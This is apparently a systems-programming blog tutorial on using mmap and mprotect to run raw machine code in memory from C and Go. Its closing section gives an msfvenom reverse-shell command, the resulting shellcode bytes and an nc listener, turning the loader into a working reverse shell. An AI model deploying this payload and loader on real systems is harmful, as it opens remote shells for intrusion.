Playing with MMap
Intro to mmap
mmap is a really awesome Linux system call for creating memory maps; basically a virtual buffer
inside the address space of the calling process. Used for anonymous memory, it’s similar to VirtualAlloc on Windows and serves
a similar purpose. It can also “map” files or devices into the current address space, thereby
treating a file or device as if it were inside RAM. This avoids the extra copy and per-call overhead
that normal read() and write() operations incur, since the kernel pages the data in on demand and you
access it directly in memory.
With a memory mapped file, file reading could be done as easily as shifting a pointer through memory
and looking at the content; no need for explicit read() and write() calls. It’s also possible to
create executable areas of memory, and then jump into the memory and run it as a part of the program.
What’s super fascinating about this is that you can create programs that write other programs to
memory and run them in-process. For example, you could write a compiler for your own language, and
instead of compiling out an executable, just write the compiled bytes to a memory mapped file, and
execute it in memory. This is the concept behind Just-In-Time (JIT) compilation.
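To make the pointer-walking style of file reading concrete, here is a minimal sketch in C. The helper name count_newlines is made up for illustration, and it assumes a regular file on a POSIX system; it is not the only way to do this.

```c
#define _DEFAULT_SOURCE /* expose POSIX declarations under strict -std= modes */
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: count '\n' bytes in a file by walking a pointer
   across a read-only mapping. Returns -1 on error. */
long count_newlines(const char *path) {
  assert(path != NULL);

  int fd = open(path, O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }

  struct stat st;
  if (fstat(fd, &st) != 0) {
    perror("fstat");
    close(fd);
    return -1;
  }
  if (st.st_size == 0) { /* mmap rejects a zero-length mapping */
    close(fd);
    return 0;
  }

  size_t len = (size_t)st.st_size;
  const char *data = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
  close(fd); /* the mapping stays valid after the descriptor is closed */
  if (data == MAP_FAILED) {
    perror("mmap");
    return -1;
  }

  /* No read() calls: the file content is just memory. */
  long count = 0;
  for (const char *p = data; p < data + len; p++) {
    if (*p == '\n') count++;
  }

  munmap((void *)data, len);
  return count;
}
```

Calling count_newlines("some/file.txt") returns the number of lines that end in a newline, or -1 if the file could not be opened or mapped.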
Using mmap from C
C is an incredibly powerful language and it allows you to cast pointers to functions without complaint. Types are C’s way to pretend it has friendly developer ergonomics, meanwhile flexing its nonchalant attitude that bytes are just bytes and mean whatever the fuck you want them to mean.
There is not a lot to the mmap API and we’re going to be calling it like this:
void *mem =
mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
What we’re asking for here, according to the doco at https://man7.org/linux/man-pages/man2/mmap.2.html, is
for the Linux kernel to find whatever spot it can of size size and mark it writeable, readable,
private and anonymous:
- By passing NULL as the address, the kernel makes the decision of where to create the map. Otherwise, we’d have to be aware of our own address space, and know what pointer we want to provide for where to create the map. In our case, I don’t care and the kernel knows best.
- size is the size in bytes, and I’ll show you where that comes from shortly.
- PROT_WRITE and PROT_READ are just protection flags and this is what I pass as default since I know I want to both write and read from the map.
- MAP_PRIVATE and MAP_ANON are because it should be invisible to other processes (the opposite of MAP_SHARED, for example), and I want it to be anonymous, meaning it’s not actually backed by anything on disk.
- Since we passed the MAP_ANON flag, we then pass -1 as the file descriptor since there is no backing file.
- We pass 0 for the offset, since there is no offset and no backing file to offset into anyway.
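One detail worth seeing in code is how the call reports failure: mmap returns MAP_FAILED, which is (void *)-1, rather than NULL. The sketch below wraps the same call in a made-up helper, map_scratch, that converts the failure into NULL so callers can use the usual pointer check. Treat it as an illustration under those assumptions.

```c
#define _DEFAULT_SOURCE /* expose MAP_ANON under strict -std= modes */
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: reserve `size` bytes of private, anonymous,
   read/write memory. Returns NULL on failure. */
uint8_t *map_scratch(size_t size) {
  void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANON, -1, 0);
  if (mem == MAP_FAILED) { /* failure is (void *)-1, not NULL */
    perror("mmap");
    return NULL;
  }
  /* With a NULL hint the kernel picks the address, and it is page-aligned. */
  assert((uintptr_t)mem % (uintptr_t)sysconf(_SC_PAGESIZE) == 0);
  return mem;
}
```

A fresh anonymous mapping is zero-filled, so the bytes read as 0 until you write to them. When you are done, hand the region back with munmap(ptr, size).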
Once we have a pointer to our anonymous mapping, we just call memcpy to get our data into
it. However, even if we cast it to a function now, we can’t actually call it. Calling it would require
the instruction pointer to land in that memory and start executing, and that faults
unless the area is marked as executable. So we need another Linux syscall called mprotect,
which is just short for memory protect. It changes the protection flags on an existing mapping, the same
flags we passed to mmap when creating it. mprotect has doco at https://man7.org/linux/man-pages/man2/mprotect.2.html
int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
This time we are asking for the same memory to be re-protected as executable and readable. Most systems
will require executable memory to also be readable and that makes sense. res will hold the return
code which should be 0 if everything went well.
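The map, copy, re-protect sequence can be folded into one function. This is a rough sketch with a made-up name, load_code. It keeps the memory writable only while copying and executable only afterwards, so it is never both at once. Some hardened systems may refuse PROT_EXEC on anonymous memory, in which case mprotect fails and the helper returns NULL.

```c
#define _DEFAULT_SOURCE /* expose MAP_ANON under strict -std= modes */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: copy `len` bytes of machine code into a fresh
   mapping, then flip it from read/write to read/execute.
   Returns NULL on failure. */
void *load_code(const uint8_t *code, size_t len) {
  assert(code != NULL);

  void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANON, -1, 0);
  if (mem == MAP_FAILED) {
    perror("mmap");
    return NULL;
  }

  memcpy(mem, code, len);

  /* mprotect returns 0 on success and -1 with errno set on failure. */
  if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
    perror("mprotect");
    munmap(mem, len);
    return NULL;
  }
  return mem;
}
```

The returned pointer is still readable, so you can memcmp it against the source bytes to check the copy before casting it to a function pointer.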
So now that we have a way of creating an executable bit of memory, we need to be able to actually execute it.
In C, this is straightforward. We create a type of function, then cast the pointer we have to be an
instance of that function, then call it:
// Firstly, create the definition, called Func, because naming is hard
typedef int (*Func)(void);
// Cast the pointer to our Func
Func func = (Func)mem;
// Then call it
func();
Now, the reason I created Func as a function that returns an int is because of the code I was
trying to run in memory. Using FASM, I created the bytes I care about (code.asm):
use64
format binary
mov rax, 69
ret
And then assembled it with fasm code.asm. cat code.bin | xxd -p gives the raw bytes to populate
in the calling C code. This FASM code simply puts 69 in the rax register, which is used as the
return value register, and then calls ret, which does the job of C’s return: it pops
the return address off the call stack and jumps back to the point in the C code that made the call. Since the
assembly returns an integer, the C function type we are casting to must expect an integer return.
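The eight bytes that come out of the assembler follow a fixed pattern, so you can also build them by hand. The sketch below is x86-64 only and uses a made-up helper name, emit_return_const. It writes the encoding of mov rax, imm32 followed by ret for any 32-bit value, which is about the smallest possible taste of what a JIT does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { RETURN_CONST_LEN = 8 };

/* Hypothetical helper: write the x86-64 encoding of
     mov rax, <value>   ; 48 c7 c0 <imm32, little-endian>
     ret                ; c3
   into out, which must have room for RETURN_CONST_LEN bytes.
   Returns the number of bytes written. */
size_t emit_return_const(uint8_t *out, int32_t value) {
  assert(out != NULL);

  /* REX.W prefix, opcode for mov r/m64 with a sign-extended imm32,
     and a ModRM byte selecting rax as the destination. */
  static const uint8_t prefix[] = {0x48, 0xc7, 0xc0};
  memcpy(out, prefix, sizeof(prefix));

  /* The immediate is stored least significant byte first. */
  uint32_t imm = (uint32_t)value;
  out[3] = (uint8_t)(imm & 0xff);
  out[4] = (uint8_t)((imm >> 8) & 0xff);
  out[5] = (uint8_t)((imm >> 16) & 0xff);
  out[6] = (uint8_t)((imm >> 24) & 0xff);

  out[7] = 0xc3; /* ret */
  return RETURN_CONST_LEN;
}
```

Calling emit_return_const(buf, 69) fills buf with 48 c7 c0 45 00 00 00 c3, the same bytes xxd printed for code.bin.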
The full working code in C is:
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

typedef int (*Func)(void);

int main(void) {
  // mov rax, 69; ret
  uint8_t code[] = {0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3};
  size_t size = sizeof(code) / sizeof(code[0]);

  void *mem =
      mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
  // mmap signals failure with MAP_FAILED, not NULL
  if (mem == MAP_FAILED) {
    printf("Failed to map memory\n");
    return 1;
  }

  memcpy(mem, code, size);

  // Swap write access for execute access before calling into the memory
  int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
  if (res != 0) {
    printf("Failed to make memory executable!\n");
    return 2;
  }

  Func func = (Func)mem;
  return func();
}
And it is compilable and runnable as this:
gcc -o test -lc test.c && ./test; echo $?
69
This gives us the expected return code of 69. Pretty straightforward.
If you’re like me, then this seems pretty cool, but you may not want to do this in C even though this specifically is easy. The rest of C often offers more pain than value. Let’s do it in Golang instead!
Using mmap from Golang
Golang makes this process a bit harder. You can definitely use mmap and mprotect easily enough
since the unix libraries exist and they map almost 1:1 to the actual syscalls. They’re the easy
part:
// mmap call
mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
// mprotect call (err is already declared above, so this is a plain assignment)
err = unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC)
The order of arguments has changed slightly for mmap and the file descriptor and offsets come first,
and mprotect no longer needs the size, just the slice reference.
However, Golang does not use the same calling convention as C; see https://go.dev/src/cmd/compile/abi-internal for the details. Notice the complicated rules for how calling works in Golang? They actually make a lot of sense and there is nothing bad at all in the way Golang does this; it’s perfect for Golang, but it means there is some difficulty with simply calling raw bytes as a function. We now have a multi-step process to go from bytes to function in Golang.
Firstly, when you call mmap in Golang, the result, even though it’s a []byte, is not just a
bare pointer to an area of memory like in C. It’s a Golang slice. This is a Golang construct
that carries its own length and capacity alongside a pointer to the underlying data. So the []byte
you get back is a slice header, and not a pointer to an area of memory. However, the actual pointer is there
and we can get it by reinterpreting an unsafe pointer to the slice as a struct of equivalent
shape to the actual Golang slice header, then using its internal data pointer to build a function value. So we build
these two structures first to be our representation of Golang’s internal functions and slices:
type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}
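So when we have a Golang slice, we now have to effectively reinterpret it as our slice representation,
extract the pointer to its data and use it to construct our representation of a function, fn, then
cast it to a higher level Golang func. This works because a Golang func value is itself a pointer to a
small struct whose first word is the address of the code, which is the shape our fn struct mimics: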
s := (*slice)(unsafe.Pointer(&mem))
f := &fn{ptr: s.Data}
execFn := *(*func() int)(unsafe.Pointer(&f))
I think this is truly fascinating because you have to understand how Golang is actually representing
slices and functions otherwise the conversion would be impossible.
We can now run the function we’ve created by calling execFn(). For this demo, I’m using the same
FASM generated assembly as before:
package main

import (
	"fmt"
	"os"
	"unsafe"

	"golang.org/x/sys/unix"
)

type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}

func main() {
	code := []byte{0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3}

	mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	n := copy(mem, code)
	if n != len(code) {
		fmt.Println("Failed to copy entire code into mmap")
		os.Exit(2)
	}

	if err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC); err != nil {
		fmt.Println(err)
		os.Exit(3)
	}

	s := (*slice)(unsafe.Pointer(&mem))
	f := &fn{ptr: s.Data}
	execFn := *(*func() int)(unsafe.Pointer(&f))

	os.Exit(execFn())
}
You will need to go get "golang.org/x/sys/unix" to make sure you have the required unix package
first, otherwise, Mmap and Mprotect won’t be available to you. Finally, run the code:
go run main.go
exit status 69
We have got our exit code as expected.
Next steps
This can be extended to other uses, penetration testing being one example. It’s trivial to
generate a reverse shell with msfvenom, get the raw bytes, and use them in place of our code for a more interesting
example.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -b "\x00" --encoder none 2>/dev/null | xxd -p -c 0 | sed 's/../0x&,/g; s/,$//'
This will give a payload of:
0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,0x48,0x97,0x48,0xb9,0x02,0x00,0x11,0x5c,0x7f,0x00,0x00,0x01,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x6a,0x03,0x5e,0x48,0xff,0xce,0x6a,0x21,0x58,0x0f,0x05,0x75,0xf6,0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x52,0x57,0x48,0x89,0xe6,0x0f,0x05
We can catch the reverse shell using nc -lnvp 4444 in one terminal, and run go run main.go in another.